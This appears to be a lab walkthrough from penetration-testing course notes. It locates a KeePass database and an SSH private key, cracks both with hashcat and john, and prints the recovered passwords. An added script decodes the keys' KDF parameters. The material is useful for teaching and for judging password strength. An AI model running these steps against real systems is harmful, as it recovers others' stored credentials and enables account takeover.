We locate the KeePass .kdbx file from Windows:
PS C:\Users\jason> Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
    Directory: C:\Users\jason\Documents
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         5/30/2022   8:19 AM           1982 Database.kdbx
We transfer the file to our Linux machine and convert it to a hash with keepass2john:
kali@kali:~/passwordattacks$ keepass2john Database.kdbx > keepass.hash
kali@kali:~/passwordattacks$ cat keepass.hash
Database:$keepass$*2*60*0*d74e29a727e9338717d27a7d457ba3486d20dec73a9db1a7fbc7a068c9aec6bd*04b0bfd787898d8dcd4d463ee768e55337ff001ddfac98c961219d942fb0cfba*5273cc73b9584fbd843d1ee309d2ba47*1dcad0a3e50f684510c5ab14e1eecbb63671acae14a77eff9aa319b63d71ddb9*17c3ebc9c4c3535689cb9cb501284203b7c66b0ae2fbf0c2763ee920277496c1
Finally, we delete the leading label (Database:) to leave a clean hash and pass it to hashcat with mode 13400:
kali@kali:~/passwordattacks$ hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
hashcat (v6.2.5) starting
...
$keepass$*2*60*0*d74e29a727e9338717d27a7d457ba3486d20dec73a9db1a7fbc7a068c9aec6bd*04b0bfd787898d8dcd4d463ee768e55337ff001ddfac98c961219d942fb0cfba*5273cc73b9584fbd843d1ee309d2ba47*1dcad0a3e50f684510c5ab14e1eecbb63671acae14a77eff9aa319b63d71ddb9*17c3ebc9c4c3535689cb9cb501284203b7c66b0ae2fbf0c2763ee920277496c1:qwertyuiop123!
With that password we can now access the KeePass password manager.
In a situation like this one, where we need the passphrase to authenticate over ssh with an id_rsa, we can crack it:
kali@kali:~/passwordattacks$ chmod 600 id_rsa
kali@kali:~/passwordattacks$ ssh -i id_rsa -p 2222 [email protected]
The authenticity of host '[192.168.50.201]:2222 ([192.168.50.201]:2222)' can't be established.
ED25519 key fingerprint is SHA256:ab7+Mzb+0/fX5yv1tIDQsW/55n333/oGARIluRonao4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.50.201]:2222' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Enter passphrase for key 'id_rsa':
Enter passphrase for key 'id_rsa':
[email protected]'s password:
We run the ssh2john tool on the key to extract its hash:
kali@kali:~/passwordattacks$ ssh2john id_rsa > ssh.hash
kali@kali:~/passwordattacks$ cat ssh.hash
id_rsa:$sshng$6$16$7059e78a8d3764ea1e883fcdf592feb7$1894$6f70656e7373682d6b65792d7631000000000a6165733235362d6374720000000662637279707400000018000000107059e78a8d3764ea1e883fcdf592feb7000000100000000100000197000000077373682...
Then we crack the hash with john or hashcat:
kali@kali:~/passwordattacks$ john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Umbrella137! (?)
1g 0:00:00:00 DONE (2022-05-30 11:19) 1.785g/s 32.14p/s 32.14c/s 32.14C/s Window137!..Umbrella137#
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now we have the passphrase to authenticate with the id_rsa.
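The cost of each password guess against these two files is set by key-derivation parameters stored in the files themselves, and both hash lines above expose them. The following Python script is an added example, not part of the original notes: it decodes the openssh-key-v1 header carried in the ssh.hash line and reads the rounds field of the keepass.hash line. The function and constant names are hypothetical, and the keepass2john field layout (second `*`-separated value after `$keepass$*` is the transform rounds) is an assumption of this example.

```python
import struct

MAGIC = b"openssh-key-v1\x00"
# Leading bytes of the key blob, copied from the ssh.hash line above
# (header only, up to the key-count field; the rest is elided on the page).
SSH_BLOB_HEX = (
    "6f70656e7373682d6b65792d763100"
    "0000000a6165733235362d637472"
    "00000006626372797074"
    "00000018"
    "000000107059e78a8d3764ea1e883fcdf592feb7"
    "00000010"
    "00000001"
)
KEEPASS_HASH_PREFIX = "$keepass$*2*60*0*"  # leading fields of keepass.hash above


def _read_string(buf, off):
    """Read one SSH wire-format string: uint32 length, then that many bytes."""
    (n,) = struct.unpack_from(">I", buf, off)
    end = off + 4 + n
    if end > len(buf):
        raise ValueError("truncated field")
    return buf[off + 4:end], end


def openssh_key_kdf(blob):
    """Return cipher, KDF, salt and rounds from an openssh-key-v1 header."""
    if not blob.startswith(MAGIC):
        raise ValueError("not an openssh-key-v1 blob")
    cipher, off = _read_string(blob, len(MAGIC))
    kdf, off = _read_string(blob, off)
    opts, off = _read_string(blob, off)
    info = {"cipher": cipher.decode(), "kdf": kdf.decode(), "salt": None, "rounds": None}
    if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
        salt, o = _read_string(opts, 0)
        (rounds,) = struct.unpack_from(">I", opts, o)
        info.update(salt=salt.hex(), rounds=rounds)
    return info


def keepass_rounds(hash_line):
    """Transform rounds from a keepass2john line (field layout is assumed)."""
    fields = hash_line.split("$keepass$*", 1)[1].split("*")
    return int(fields[1])


if __name__ == "__main__":
    print(openssh_key_kdf(bytes.fromhex(SSH_BLOB_HEX)), keepass_rounds(KEEPASS_HASH_PREFIX))
```

The 16 rounds decoded here match john's "Cost 2 (iteration count) is 16" line; when a key is created or re-encrypted, `ssh-keygen -a` sets a higher round count.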